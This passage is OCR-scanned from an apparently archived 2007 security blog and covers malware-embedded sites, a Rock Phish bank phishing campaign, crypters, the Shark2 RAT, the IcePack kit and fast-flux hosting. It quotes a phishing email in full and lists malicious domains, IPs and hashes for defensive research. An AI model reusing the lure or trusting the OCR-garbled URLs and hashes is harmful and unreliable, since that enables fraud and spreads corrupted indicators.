order to harness the power of a university site's pagerank so 
that the malicious sites get higher priority in search engines 

- a push approach - [8]via spam and [9]phishing emails, a 
digital greed so that in case the attackers cannot trick you 
into giving them your accounting and financial data, they'll 
infect you with malware in between, a trend which I'm 

seeing recently. Basically, you have a fake PayPal phishing 
page hosting malware in between the scam 

- passive - using advertising networks are infection vectors, 
basically a fake but reputable looking service or product 
centered site is set up, an advertising budget on a CPC basis 
is considered, and even though you may visit Yahoo.com 

an ad appearing at the top though a third-party advertising 
network may indeed turn out to be one loading a malicious 
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payload. We've already seen this malicious cycle with zero 
day vulnerabilities trying to take the maximum advantage 

out of the window of opportunity of a certain vulnerability, 
and despite that zero day vulnerabilities are greatly desired 
by malware authors, the plain simple truth whose 
effectiveness we've seen with MPack is that the attack was a 
very 

successful one given it was abusing old vulnerabilities. So, if 
the end user doesn't patch, [10]an old and already 

patched vulnerability has the same value as a zero day one, 
isn't it? 


Why are malware embedded web sites increasing? 


- Web application vulnerabilities exploited in an automated 
fashion make it possible for malicious attackers to inject 
malicious pages within domains with high page rank and 
ones attracting lots of traffic. In a previous post I provided 

various screenshots of [lljan IRC controlled bot google 
hacking for vulnerabilities and injecting web shells to take 

control over the vulnerable sites. Next time it could logically 
be [12]web backdoors making it harder for the exploited 
party to react given the perimeter defense myopia they're 
still living in 

- [ 13]DIY malware kits make it possible for virtially anyone to 
embed malware on a web page. In my M [14]Future 

Trends of Malware" publication I emphasized on how open 
source malware is undermining the entire singnatures 

based detection model, at least in respect of timing. Open 
source malware evolved into [15]open source exploitation 

and statistics tools, thus lowering the entry barriers into the 
malware area for anyone who has obtained the source 

code of these kits. It's even more interesting to note that 
given the open source nature of the kits, modifications 

are already getting traded and used in the wild, so basically, 
the MPack kit we know of last month is someone elses's 

advanced malware distribution platform next month. 
Anyway, going through an interview with the authors of 
MPack, 



I'd rather say - a little less who, and a little bit more on 
what's to come in this space, would be a wise approach 

- Malicious pages hosting service on usually compromised 
servers on purposely ignoring "take down notices" to further 
extend the window of opportunity for someone to visit and 
get infected. Various vendors such as [16]RSA and 
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[17]NetCraft are already developing a market segment for 
timely shutting down such phishing and malware hosting 
web sites, and by the time the service scales enought I'd be 
very interested in seeing some averages based on the 

time it took them to shut down such a site 

- A logical move exploiting the overall lack of awareness from 
the end user's part on how client side vulnerabilities 

result in malware infections compared to potentially malware 
infected downloads as it used to be in the past, a very 

tricky situation by itself taking into consideration the future 
growth of E-commerce. With [18]end users becoming 

more privacy conscious, and the countless users who 
wouldn't purchase anything only for more than $50 let's say, 

trying to communicate to them that malware can be found 
on literally any web site and that it's not longer coming in 

the typical binary nature they're used to, could undermine 
their confidence in E-commerce even more 

- [19]Malicious economies of scale, a phrase I coined to bring 
the discussion at another level, namely, that malware 



authors are putting less efforts but achieving a higher level 
of productivity, greatly represents the concept of malware 
embedded sites 

[20]Here are more articles presenting [21]other points of 

[22] view on the topic. 

Related posts: 

[23] Massive Embedded Web Attack in Italy 

[24] The MPack Attack Kit on Video 

[25] Exploits Hosting Domains 

[26] Exploits Hosting Domains - Part Two 

[27] An Analysis of ms-counter.com 

[28] The WebAttacker in Action 
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Confirm Your Gullibility (2007-07-26 11:43) 

The Rock Phish kit in action. Registered yesterday, a .info 
domain is faking a Royal Bank of Scotland Customer 

Confirmation Form, and is a great indication on the 
convergence of spam and phishing, part of [l]the phishing 

ecosystem in terms of cooperation. 

Message source spoofed from : 

corporateclients.refj2225451hh.ib @ rbs.co.uk 

Message content : Dear Royal Bank of Scotland customer, 

The Royal Bank of Scotland Customer Service requests you 
to complete Digital Banking Customer Confirmation Form 

(CCF). This procedure is obligatory for all customers of the 
Royal Bank of Scotland. Please select the hyperlink and visit 
the address listed to access Digital Banking Customer 
Confirmation Form (CCF). Again, thank you for choosing the 

Royal Bank of Scotland for your business needs. We look 
forward to working with you. ***** Please do not respond 

to this email *****This mail is generated by an automated 
service. 
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Sender's IP : Listed by only one of the popular anti-spam 
blacklists 

Domain info : buhank.info ; 81.215.226.34 ; Created On: 
25-Jul-2007 18:53:03 UTC ; Expiration Date: 25-Jul-2008 


18:53:03 UTC. 


HTTP/1.1 200 OK 

Date: Wed, 25 Jul 2007 22:21:30 GMT 

Server: Apache/1.3.37 (Unix) mod _ssl/2.8.28 
OpenSSL/0.9.7f PHP/4.4.4 

mod _perl/1.29 FrontPage/5.0.2.2510 

Last-Modified: Tue, 26Jun 2007 19:05:56 GMT 

ETag: M e6c64f-23f9-46816394 M 

Accept-Ranges: bytes 

Content-Length: 9209 

Content-Type: text/html 

Main index returns "209 Host Locked" message typical for 
Rock Phish. 

Phishing URL : sessionid- 
02792683.rbs.co.uk.buhank.info/customerd 
i rectory/d i rect/ccf.aspx 

Original URL : rbs.co.uk/Bank_Online/logon_to_digital 
_banking/default.asp 

It's cost-effective not to register a phishing domain for long 
than an year, given its "lifetime", that's for sure. 

Having your own certificate authority is even better, given 
they've actually implemented it since there's no httpS 



option available, thus this phishing campaign is doomed to 
failure. And while the message and the spoofed site look 

relatively decent, the people behind this phishing campaign 
are newbies using the Rock Phish phishing kit. Efficiency 

of DIY phishing kits VS the quality of the phishing site. 
[2]More info on this [3]campaign and [4]Rock Phish, as well 
as SpamHaus.org's recent efforts on [5]Iimiting the lifetime 
of Rock Phish domains. 

Rock Phish screenshot courtesy of [6]Fortinet. 
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Related posts : 

[7] Phishing Domains Hosting Multiple Phishing Sites 

[8] lnteresting Anti-phishing Projects 

[9] Taking Down Phishing Sites - a Business Model? 

[10] Take this Malicious Site Down - Processing Order.. 
[lljAnti-phishing Toolbars - Can You Trust Them? 

1. http://ddanchev.blo as pot.com/2007/02/phishin a- 
ecosvstem.html 

2. http://www.castlecops.com/checkl95875next.html 

3. 

http://www.castlecoos.com/Rock Phish Roval Bank of Scotia 
nd phish503829.html 


4. htto://www.voutube.com/watch?v=6Nviim064a A 















5. http://www.spamhaus.or a /or a anization/statement.lasso? 
ref =7 


6. http://www.forti a uardcenter.com/ 

7. http://ddanchev.blo as pot.com/2006/12/phishin a -donnains- 
hostin a -multiple.html 

8. http://ddanchev.blo as pot.com/2006/09/interestin a -anti- 
phishin a- pro i ects.html 

9. http://ddanchev.blo as pot.com/2007/Q4/takin a -down- 
phishin a -sites-business.html 

10. http://ddanchev.blo as pot.com/2007/Q3/take-this- 
malicious-site-down.html 


11. http://ddanchev.blo as pot.com/2006/Q3/anti-phishin a- 
toolbars-can-vou-trust.html 
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Cyber Jihadists' and TOR (2007-07-26 20:08) 

You've always knew it, I've always speculated on it, now I can 
finally provide a decent screenshot of cyber jihadist's howto 
recommending and taking the average reader step by step 
through the process of obtaining and using TOR 

- a "rocket science" by itself. Following previous comments 
regarding [ 1 ]Jihadists' Anonymous Internet Surfing 
Preferences I also pointed out on the obsolesence of 
[2]Samping Jihadist IPs at various forums and sites, as it's 
both obvious and logical to consider that surfing, 
reconnaissance and communication is happening in a 
tunneled nature. 

































Related posts: 

[3] Cyber Traps for Wannabe Jihadists 

[4] Mujahideen Secrets Encryption Tool 

[5] The Current State of Internet Jihad 

[6] Characteristics of Islamist Web Sites 

[7] A List of Terrorists' Blogs 

[8] An Analysis of the Technical Mujahid Issue One 

[9] An Analysis of the Technical Mujahid Issue Two 
[lOJTerrorist Groups' Brand Identities 

1. http://ddanchev.blo as DOt.com/2007/05/ 1 ihadists- 
anonvmous-internet-surfin a .html 

2. http://ddanchev.blo as pot.com/2007/05/sannplin a-i ihadists- 
j ps.html 

3. http://ddanchev.blo as pot.com/2007/Q3/cvber-traps-for- 
wannabe- i ihadists.html 

4. http://ddanchev.blo as pot.com/2007/Q4/mu i ahideen- 
secrets-encr v ption-tooi.html 

5. http://ddanchev.blo as pot.com/20Q6/12/current-state-of- 
internet- i ihad.html 

6. http://ddanchev.blo as pot.com/2007/Q2/characteristics-of- 
islamist-websites.html 

7. http://ddanchev.blo as pot.com/2007/Q6/list-of-terrorists- 
blo a s.html 

































8. http://ddanchev.blo as pot.com/2006/12/analvsis-of- 
technical-mu i ahid-issue-one.html 
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9. http://ddanchev.blo as pot.com/2007/06/analvsis-of- 
technical-mu i ahid-issue-two.html 

10. http://ddanchev.blo as pot.com/2007/07/terrorist- a roups- 
brand-identities.html 
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More Malware Crypters for Sale (2007-07-26 20:29) 

There's an [l]ongoing trend among malware authors to 
either code malware crypters and packers from scratch and 

sell then at a later stage, or even more interesting, obtain 
publicly available crypters source code, modify, add extra 
featured and new encryption routines and make them 
available for sale. [2]The rise of DIY malware crypters 
enables 

literally everyone to fully obfuscate an already detected 
piece of malware, so that if no extra security measures but 

only virus signatures scanning are in place, an infection 
takes place. 

The first crypter has the following options : 

- Memory execution/injection within its own process, execute 
in a default browser's memory, or no execution in 

memory takes place but dropping 
















- Custom encryption with min and max encryption layers, 
RC4, and NTDLL Compression API 

The second crypter, a previous version of the first one, has 
the following 
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options : 

- custom resource names 

- scramble 

- custom encryption layer 

Moreover, realizing the ongoing competition among coders 
or modifyers of 

malware crypters, services such as already packed dozens of 
bots often act as a bargain in case of a possible and 

much more flexible purchase. The third crypter is a perfect 
example of a source code modification since its lacking 

any significant and unique features. 

The most dangerous threat, however, remains your lack of 
decent [3]situational awareness. 

1 . 

http://www.packetstormsecuritv.or a/pa pers/ a eneral/malware- 

trends.pdf 







2. http://ddanchev.blo as pot.com/2007/07/multi-feature- 
malware-cr v oter.html 


3. http://ddanchev.blo as pot.com/2006/09/cvber-intelli a ence- 
c vberint.html 
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Delicious Information Warfare, Saturday, 28th (2007- 
07-28 12:30) 

Here are some of the most interesting security papers, tools 
and services I stumbled upon during the week. Enjoy, 

and stay informed! 

Papers and Publications : 

- [ 1 ]Exploiting the iPhone - Paper + Video 

" Shortly after the iPhone was released, a group of security 
researchers at [2] Independent Security Evaluatorsdecided 
to investigate how hard it would be for a remote adversary 
to compromise the private information stored on the 

device. Within two weeks of part time work, we had 
successfully discovered a vulnerability, developed a 
toolchain 

for working with the iPhone's architecture (which also 
includes some tools from the #iphone-dev community), and 

created a proof-of-concept exploit capable of delivering files 
from the user's iPhone to a remote attacker. We have 
notified Apple of the vulnerability and proposed a patch. 
Apple is currently looking into it. " 











- [3]The Evolution of GPCode/Glamour RansomWare 

" This report contains a description of the more obscure, 
previously undocumented traits belonging to the GP¬ 
Code/Glamour trojan. The code is a modified version of the 
Prg/Ntos family which was detailed in depth during our 

Encrypted Malware Analysis in November 2006. White a 
majority of the functionality has not changed since then, 

this recent variant is distinctive enough to warrant additional 
research. In 

particular, the trojan is now equipped with the ability to 
encrypt a victim's files on disk. The motive for adding this 
feature is clearly monetary, as the victim is advised that the 
files will remain encrypted unless $300 is turned over to the 
authors, in exchange for a decryption utility." 

- [4]A Guide to Security Metrics 

11 In the face of regular, high-profile news reports of serious 
security breaches, security managers are more than ever 
before being held accountable for demonstrating 
effectiveness of their security programs. What means should 

managers be using to meet this challenge? Some experts 
believe that key among these should be security metrics. 

This guide provides a definition of security metrics, explains 
their value, discusses the difficulties in generating them, and 
suggests a methodology for building a security metrics 
program. " 

- [5]Secure File Deletion - Fact or Fiction? 



11 This paper will deal with how and where some of these files 
are created and how to securely remove them from a 
system. Microsoft Windows operating systems and 
associated applications will be the main focus. This paper 

is divided into two main sections, the first section is 
designed to be a primer on the types of information that can 
be found on a hard drive. It is not designed to be a fully 
detailed data recovery/computer forensics tutorial, but is 
designed to show security professionals how much 
information can be found on a hard drive. The second 
section 

deals with the concepts behind securely deleting files and 
associated data from a hard drive. " 
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- [6]Group Policy Extensions in Windows Vista and Windows 
Server 2008 - Part 1 

11 Some of the more useful new group policy settings 
included in Windows Server 2008 and Windows Vista. " 

- [7]Hooking CPUID - A Virtual Machine Monitor Rootkit 
Framework 

11 One of the fascinating debates taking place around the 
web is whether or not an OS can detect if it is running inside 
a VM. Surely a VMM will never be able to fool an external 
dock but discounting that, who knows? In any regard, / have 
written a small VMM that attempts to place the host OS into 
a VM and then handles the basic subset of unconditional VM- 
exits. Great. Now what? " 


- [8]BIND 9 DNS Cache Poisoning 



11 This weakness can be turned into a mass attack in the 
following way: (1) the attacker lures a single user that uses 
the target DNS server to dick on a link. No further action 
other than clicking the link is required (2) by clicking the link 
the user starts a chain reaction that eventually poisons the 
DNS server?s cache (subject to some standard conditions) 
and associates fraudulent IP addresses with real website 
domains. (3) AH users that use this DNS server will now 

reach the fraudulent website each time they try to reach the 
real website. 11 

- [9]Secure Programming Best Practices for Windows Vista 
Sidebar Gadgets 

11 Today, the Windows Vista Sidebar hosts Gadgets built from 
HTML, JavaScript, and potentially ActiveX controls, and 
because Gadgets are HTML, they are subject to Cross-site 
Scripting style bugs. These bugs are extremely serious 

because script in the Sidebar is capable of running arbitrary 
code in the context of the locally logged-on user. This 
document outlines some of the secure programming best 
practices that should be considered when building Windows 

Vista Sidebar Gadgets. 11 

- [10]Wardriving Bots 

11 wardriving-bot's are autonomous systems that are installed 
in a train, car, bus, taxi or truck and collect wardriving 
data's, like SSID, GPS-data, MAC address and all other stuff, 
that kismet can handle, after collecting this data, 

encrypting, the bot try to send this information back to the 
Bot-Handler with using a "open" accespoint or a HotSpot. " 



- [11]KYE: Fast-Flux Service Networks 

11 This whitepaper details a growing technique within the 
criminal community called fast-flux networks. This is an 
architecture that builds more robust networks for malicious 
activity while making them more difficult to track and 
shutdown. This is the first KYE paper we are releasing in both 
.pdf and .htmi format. " 

Security Tools : 

- [12]Atsiv vl.01 - load, list and unload signed or unsigned 
drivers on 32 and 64 bit versions of Windows XP, 

2K3 and Vista 

11 Atsiv is a command line tool that allows the user to load 
and unload signed or unsigned drivers on 32 and 64 bit 
versions of Windows XP, Windows 2K3 and Windows Vista. 
Atsiv is designed to provide compatibility for legacy 

drivers and to allow the hobbyist community to run unsigned 
drivers without rebooting with special boot options or denial 
of service under Vista. " 

- [13]Secunia Personal Software Inspector - Checks Over 
4,200 Applications for Latest Patches 

11 The Secunia PSI detects installed software and categorises 
your software as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software 
installations where more secure versions are 

available from the vendors. " 

- [ 14] FHI HAT - High Interaction Floneypot Analysis Toolkit 



11 The High Interaction Honeypot Analysis Toolkit (HIHAT) 
allows to transform arbitrary PHP applications into web- 
based high-interaction Honey pots. Furthermore a graphical 
user interface is provided which supports the process of 360 

monitoring the honeypot and analysing the acquired data. " 

- [15]GPCode Ransom Trojan Decoder 

11 Recent reports of GPCode, a Ransom Trojan that encrypts 
files and asks for $300.00 to unlock the victim files have 
been hitting headlines in the news. Secure Science has 
offered a freely available decoder for freeing up the 

files without any problems. This program was written as 
open source software in the interest of support for other 

researchers. If you have become a victim of the GPCode 
Ransom trojan, please download a copy and run it on your 

systems and it will decrypt the files back to the state they 
were in before the trojan infected the computer. " 

- [16]Rootkit Detective vl.O 

11 McAfee Rootkit Detective is a program designed and 
developed by McAfee Avert Labs to proactively detect and 
clean rootkits that are running on the system. " 

- [17]CSRF Redirector 

11 Inspired by the [18] XSS POST Forwarder, / just created the 
[19] CSRF Redirector. It's a simple tool that makes it easy to 
test [20] CSRFusing POST, hopefully demonstrating how 
prevalent CSRF vulnerabilities are as well as reducing the 
misconception that forging a POST request is complicated. " 


- [21]WordPress Security Scanner 



11 The [22] Word Press version survey was largely successful; it 
was released on both [23] Slashdotand [24] Security Fo¬ 
cus which I am quite pleased about, but now onto something 
even more interesting - that was just the appetizer. / 

received aiot of questions regarding how my survey was 
conducted. I was going to write an aftermath post (which I 

still may do), but decided to release my tool, "wp-scanner" 
instead. " 

- [25]WAZ v 1.0 - Windows Anti DDoS Tool 

11 Through my study and research I found lots of networks 
that are under the hood of Ddos attacks. WAZ is a solution to 
this. The tool is fully functional and effective in stopping the 
Ddos agents. You can find lots of Ddos agents like Trinoo, 
WinTrinoo, Shaft, Mstream, Stacheldhart Ver 1 & 2, Trinity, 
Entitee etc. They are considered to be the best agents to 
launch distributed denial of service attacks. " 

- [26]The Ultimate Distributed Cracker 

11 The main purpose of UDC is the recovery of the passwords 
by the given hash-values (NTLM, MD5, SQL, SHA1 and 40+ 
other). The typical user can recover own forgotten 
passwords, for example, Windows NT/XP/2003 authorization 

passwords. Multithreaded and distributed recovery modes 
are supported. The new method for precalculating Hybrid 

Attack using Rainbow Tables is introduced. Now there's 
nothing unbreakable" 

- [27]MITRE Honeyclient Project 

11 Honeyclients can proactively detect exploits against client 
applications without known signatures. This framework uses 



a client-server model with SOAP messaging as the primary 
communication method, and uses the free version of 

VMware Server as a means of virtualizing the client 
environment. " 

- [28]PSA3 - PHP Source Auditor III 

11 PHP Source Auditor Hi (or PSA3) was created in order to 
quickly find vulnerabilities in PHP source code. Written in 
Perl. " 

- [29]Javascript LAN scanner 

11 Any information obtained using the scanner will not be 
logged in any way. AH new router form submissions are 
anonymous" 

Services & Misc : 
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- [30]10 Free Services to Send Self-Destructing/Auto-Expiring 
Emails 

11 Self Destructing emails delete the original message once it 
has been read by the recipient. While they are not 
completely foot proof, for example, someone can take a 
photo of the message with the camera, the record on the 

Internet does not remain. Here are a few seif destructing 
email providers that you might find useful for sending 

emails. Some even provide free plug-ins for sending emails 
through a desktop based email client such as Outlook or 
Thunderbird. " 



- [31]Video - Using Darik's Boot and Nuke (DBAN) to Totally 
Wipe a Drive 

" Another continuation of my [32] file carving videoand [33] 
selective file shredding (DOD 5220.22-M) to thwart forensics 
toolsvideo, this video shows how to use Darik's Boot and 
Nuke (DBAN) to totally wipe a drive. DBAN is a 

great tool to add to your anti-forensics tool box. " 

- [34]Videos from the ToorCon Information Security 
Conference 

- [35]CISSP Certification Verification Site 

11 Check (ISC)? credential status for an individual or find 
credential holders within a company or geographic area. " 

1. http://www.securitvevaluators.com/iohone/ 

2. http://www.securitvevaluators.com/ 

3. http://ip.securescience.net/advisories/Glamour- 
RansomWare.pdf 

4. 

http://www.sans.or g /readin a room/white pa pers/auditin a /55. p 

ha 

5. 

http://www.sans.or a /readin a room/white pa pers/incident/631. 
RtLR 

6 . 

http://www.windowsnetworkin a .com/articlestutorials/Grou p- 

Policv-Extensions-Windows-Vista-Windows-Server- 























2008-Partl.html 


7. http://rootkit.com/newsread. ph p7newsid = 758 

8. http://www.trusteer.com/docs/bind9dns.html 

9. http://msdn2.microsoft.com/en-us/librarv/bb498012.as px 

10. http://www.wardrivin a .ch/hpneu/news/wdbotl/index.html 

11. http://honevnet.or g/pa pers/ff/index.html 

12. http://www.linchpinlabs.com/resources/atsiv/usa ge- 
desi g n.htm 

13. https://psi.secunia.com/ 

14. http://hihat.sourcefor g e.net/ 

15. 

http://www.securescience.com/securescienceblo g /ransom- 

waredecr v pted.html 

16. http://vil.nai.com/vil/averttools.as px 

17. http://shif1ett.or g /blo g /2007/ i ul/csrf-redirector 

18. http://whiteacid.or g /misc/xss post forwarder. php 

19. http://shif1ett.or g /csrf. php 

20. http://shif1ett.or g /articles/cross-site-reguest-for g eries 

21. http://blo g securitv.net/wordpress/tools/wp-scanner/ 

22. http://blo g securitv.net/wordpress/articles/article-230507/ 

23. http://it.slashdot.or g /it/07/05/24/167223.shtml 



















































24. http://www.securitvfocus.com/brief/508 

25. http://www.secniche.or a/ pro i ects/waz/ 

26. http://the-udc.com/ 

27. http://www.honevclient.or g /trac 

28. http://oacketstormsecuritv.or g /filedesc/PSA3.zip.html 

29. 

http://www.businessinfo.co.uk/labs/lan scan/Ian scan. php 

30. http://thinkabdul.com/2007/Q7/25/ten-free-services-to- 
send-self-destructin g -emails-which-expiredisa p pear- 

automaticallv-after-specified-time-interval/ 

31. http://www.iron o eek.eom/i. oh p?pao e=videos/usin o- 
dban-to-wipe-a-drive 
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32. http://www.iron o eek.com/i. php?pao e=videos/data- 
carvin g -with-photorec-to-retrieve-deleted-files-from-forma 

tted-drives-for-forensics-and-disaster-recover v 

33. http://www.iron o eek.eom/i. oh p?pao e=videos/selective- 
file-shreddin g -dod-5220-22-m-with-eraser-and-ccleaner 

-to-thwart-forensics-tools 


34. http://video. g oo g le.com/videosearch? 
hl=en&a=toorcon.or a 

35. https://www.isc2.or o/cg i-bin/cert_verification.c gi 
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Shark2 - RAT or Malware? (2007-07-28 20:57) 

The latest release (26 July 2007) of the Shark2 RAT (Remote 
Administration Tool) once again demonstrates how thin 

is in fact the line between RATs and malware. Moreover, the 
reality on how malware is often pitched as a RAT for 

educational purposes only, whereas it includes typical 
malware-like features such as virtual machine detection and 

anti virus detection, ones not so common for RAT's such as 
PC Anywhere for instance. So, it's not a RAT but malware. 

More on Shark2 : 

" sharK is an advanced remote administration tool written in 
VB6. With sharK you will be able to administrate every PC in 
the world (using Windows OS) remotely Here aresome facts: 

* sharK uses RC4 to encrypt the traffic with a random cypher 
generated every new startup. 

* sharK is able to resume downloads and uploads when the 
server disconnects on the next connect 
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* sharK is completly Plug in based! So you have a very small 
server and never need to update it (except on core changes) 

* Compressed Transfers 

* Thumbnail Previews of Pictures 


* Screen Capture with VNC-Technology (Only the parts of the 
pic that are changed since the last shot will be transfered) 

* Key logger works with Keyboard hooking 

* You have a real DOS-Shell instead of dos-output like in the 
most Remote Administration Tools 

* Interactive Process Blacklist 

* Virtual-Machine detection" 

Vendors detecting the latest builder already, despite the 
logical [l]crypter 

[2]obfuscations to come : 

AntiVir 7.4.0.50 2007.07.28 TR/Sniffer.VB.C.2 

CAT-QuickHeal 9.00 2007.07.28 Backdoor.VB.bax 

Fortinet 2.91.0.0 2007.07.28 W32/VB.BAX!tr.bdr 

Ikarus T3.1.1.8 2007.07.28 Backdoor.Win32.VB.bax 

Kaspersky 4.0.2.24 2007.07.28 Backdoor.Win32.VB.bax 
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MD5: d5eca6c6al956cb2f4261dalb8f25ee2 
SHA1: b603d0d6e3dff0f5f01e86eb82eb80a0e0455445 

1. http://ddanchev.blo as pot.com/2007/07/more-malware- 
crv pters-for-sale.html 

2. http://ddanchev.blo as pot.com/2007/07/nnore-nnalware- 
crv pters-for-sale.html 
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The IcePack Malware Kit in Action (2007-07-30 01:06) 

[l]The IcePack is a rather average web based malware C &C 
kit compared to for instance, [2]the Black Sun, [3]the 

Cyber Bot, [4]Mpack, and mostly to [5]Zunker. Average in 
terms of the lack of unique features offered, which makes 

me think that it's a hybrid of publicly obtainable stats and 
exploits rotation modules. 

After providing you with in-depth overviews of [6]the 
WebAttacker and the [7]Mpack kit large scale attacks in 
previ¬ 
ous posts, in this post I'll showcase the IcePack kit in action. 
As I've already pointed out in a previous post related to the 
[8]increasing number of malware embedded sites, malware 
authors are diversifying their traffic aggregation approaches, 
and are either exploiting the sites themselves, their ISP's 
CPanel, or using push, pull and passive embedding 
techniques to achieve their goal. 

Listening to your infection? Indeed. In the middle of the 
month, the Brazil's fan sites of popular music bands such 
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as [9]t.A.T.u and [10]Linkinpark got [ll]IFRAME-ed, and had 
their visitors infected with a IcePack loader. Let's assess the 
URL within the IFRAME appropriately. 


URL : hllp://my-loads.info 


IP : 203.121.71.165 


Response : HTTP/1.1 200 OK 

Date: Mon, 30 Jul 2007 01:02:43 GMT 

Server: Apache/1.3.37 (Unix) mod _ssl/2.8.28 
OpenSSL/0.9.8a PHP/5.2.3 mod _perl/1.29 

FrontPage/5.0.2.2510 

X-Powered-By: PHP/5.2.3 

Transfer-Encoding: chunked 

Content-Type: text/html 
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Then, we are taken to a not so sophisticated obfuscation 
pointing us to the vulnerabilities exploited and the actual 

binary. Detection rates for the loader so far: 

AntiVir 2007.07.28 TR/Crypt.U.Gen 

AVG 2007.07.28 Obfustat.AGS 

eSafe 2007.07.29 suspicious Trojan/Worm 

Ikarus 2007.07.29 Trojan-Downloader.lcePack 

McAfee 2007.07.27 New Win32 

Panda 2007.07.29 Generic Malware 

Sophos 2007.07.26 Mal/HckPk-A 


Sunbelt 2007.07.28 Trojan-Downloader.lcePack 
Symantec 2007.07.29 Downloader 
Webwasher-Gateway 2007.07.29 Trojan.Crypt.U.Gen 
File size: 6792 bytes 

MD5: Ce3291be2ded8b82fc973e5f5473blfe 

SHA1: fcf4cab3ade392c611c95el6c913fbc967577222 

More [12]screenshots of the IFRAME at Finjan's blog and a 
comment on evasive attacks : 11 The toolkit also uses evasive 
attack. By blocking specified countries and multiple 
instances from the same IP address, it minimizes exposure to 

security vendors. " Very true. Re-visting it again, I no longer 
get exploited. 

Ice Pack kit screenshots courtesy of IDT Group member while 
pitching the kit. 
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1 . 

http://blo as. pandasoftware.com/blo as/ pandalabs/archive/20 
07/07/26/Ice 2800 Pack 2900 -for-the-summer.as px 

2. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-sample 7672.html 

3. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-sample_20.html 

4. http://ddanchev.blo as pot.com/2007/06/massive- 
embedded-web-attack- i n-italv.html 


















5. 

http://blo as. pandasoftware.com/blo as/ pandalabs/archive/20 

07/05/08/Zunker.as ox 

6. http://ddanchev.blo as pot.com/2007/05/webattacker-in- 
action.html 

7. http://ddanchev.blo as pot.com/2007/06/nnpack-kit-attack- 
on-video.html 


8. http://ddanchev.blo as pot.com/2007/07/nnalware- 
embedded-sites-increasin a .html 

9. http://www.tatu a irls.com.br/ 

10. http://www.linkinparkbr.com/ 

11. http://www. a oo a le.com/interstitial? 
url = http://www.li nkinparkbr.com/ 

12. http://www.fin i an.com/MCRCblo a .aspx7Entrvld = 1601 
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World of Warcraft Domain Scam (2007-07-30 13:04) 

[1] World of Warcraft playing species, beware! Can you find 
the differences? Depending on the font type, font size and 

email client, an euphoric gamer can easily fall victim into 
this, and she will, since the domain is currently redirecting to 

[2] Blizzard's real WoW site in Europe. As you can see in the 
attached screenshot, this domain registered a week 

ago aims to trick you, and your email client font preferences, 
into thinking VV equals W, and that vvovv-europe.com 






























is indeed wow-europe.com. 

vvovv-europe.com 

69.147.83.157 

Creation Date. 2007-07-25 

Expiry Date. 2008-07-25 

Some [3]developments on the cybersquatting front: 

11 The Coalition Against Domain Name Abuse (CADNA) is 
announcing the launch of its national campaign against 

Internet fraud. A non-profit organization based in Washington 
D.C., CADNA is leading the way in confronting cyber¬ 
squatting - the fraudulent abuse of domain name 
registration that threatens the future viability of Internet 
commerce. 

Although the Anti-Cybersquatting Consumer Protection Act 
(ACPA) was introduced in 1999, cybersquatting remains 

an underestimated threat. The number of .com domain 
names alone has doubled since 2003, and the number of 

cybersquatting disputes being filed with the World 
Intellectual Property Organization (WIPO) is on the rise - up 
25 % 

in 2006 from 2005. According to a recent independent 
report, cybersquatting increased by 248 % in the past year. 11 

So far, this remains the most creative [4]typosquatting 
"scam to come" I've seen in a while. 





1. http://en.wikipedia.or g /wiki/World ofWarcraft 


2. http://www.wow-europe.com/en/index.xnnl 

3. http://complianceandprivacv.com/News-CADNA- 
campai a n.html 

4. http://en.wikipedia.or a /wiki/T v posauattin a 
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GIMF Switching Blogs (2007-07-31 12:10) 

The [ 1 ]Global Islamic Media Front like pretty much all other 
cyber jihadist supporters, and jihadist media agencies, 

seem to have fallen in love with Wordpress. Exactly one 
month since I posted [2]a list of terrorism supporting or 
glorifying blogs, both [3]GIMF's English and [4]German 
version blogs were shut down. Strike one for the good guys. 
But did 

they really dissapear from the cyber jihadist blogosphere? 
Not at all. The Global Islamic Media Front simply switched 






















propaganda to [5]this blog. Among GIMF's most notable IT 
releases are the [6]Mujahideen Secrets Encryption Tool, 

and the [7]quarterly released [8]Technical Mujahid E-zine. 

1 . 

http://www. a lobalsecuritv.or a /securit v/ profiles/ a lobal_islamic 
media front.htm 

2. http://ddanchev.blo as pot.com/2007/06/list-of-terrorists- 
blo a s.html 

3. http:// a imf.wordpress.com/ 

4. http:// a imfl.wordpress.com/ 

5. http://albattarmedia.wordpress.com/ 

6. http://ddanchev.blo as pot.com/2007/04/nnu i ahideen- 
secrets-encr v ption-tool.html 

7. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

8. http://ddanchev.blo as pot.com/2007/Q6/analvsis-of- 
technical-mu i ahid-issue-two.html 
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Feeding Packed Malware Binaries (2007-07-31 14:11) 

Remember the avvcc.com domain which I mentioned in a 
previous example of [l]a fast-flux network using the 

WebAttacker kit two months ago? It's still up and running 
this time hosting online gaming accounts password stealer, 

and the binary is packed using five [2]different packers in 
exactly the same fashion like the binary obtained two 

weeks ago. The domain itself is a great example of [3]a fast- 
flux network, a term coined by the Honeynet Project to 

showcase the growing complexity and evasive techniques 
introduced by the malicious ecosystem, on their road to 







invisibly control, evaluate and manage their malicious 
campaigns online. 

Packed binary obtained two weeks ago : 

File size: 205917 bytes 

MD5: efllbed4a5f4d61ad771204dlec6ac25 

SHA1: 6c35869de5ef20b949b3d9f53elllf26f4631569 

packers: PECompact, NsPack 

packers: PECOMPACT, BINARYRES, NSPACK 

packers: ZIP, PecBundle, PECompact 

Packed binary as of today : 

File size: 76800 bytes 

MD5: 17dl2aecb7aba82ecc38dd6d2dd3e3b3 

SHA1: 439947056dl005ec8738edl9e84bbba043556a2f 

packers: PECOMPACT, BINARYRES 
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packers: PecBundle, PECompact 

Both binaries have a relatively high detection rate, but that's 
not the point. The point is [4]the ongoing trend 

of malware embedded web sites, which in combination with a 
fast-flux network prompts the need for [Sire- 

evaluating your security policies and preemptive security 
strategy. 



Fast-flux networks graph courtesy of the [6]Honeynet Project 
& Research Alliance. 

1. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 

2. http://ddanchev.blo as pot.com/2007/07/nnore-nnalware- 
crv pters-for-sale.html 

3. http://www.honevnet.or a/pa pers/ff/fast-flux.html 

4. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-mcreasin a .html 

5. 

http://www.packetstormsecuri tv.ora/pa pers/ a eneral/securit v- 

polic v.pdf 

6. http://www.honevnet.or g/ 
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Average Online Time for Phishing Sites (2007-07-31 
21:28) 

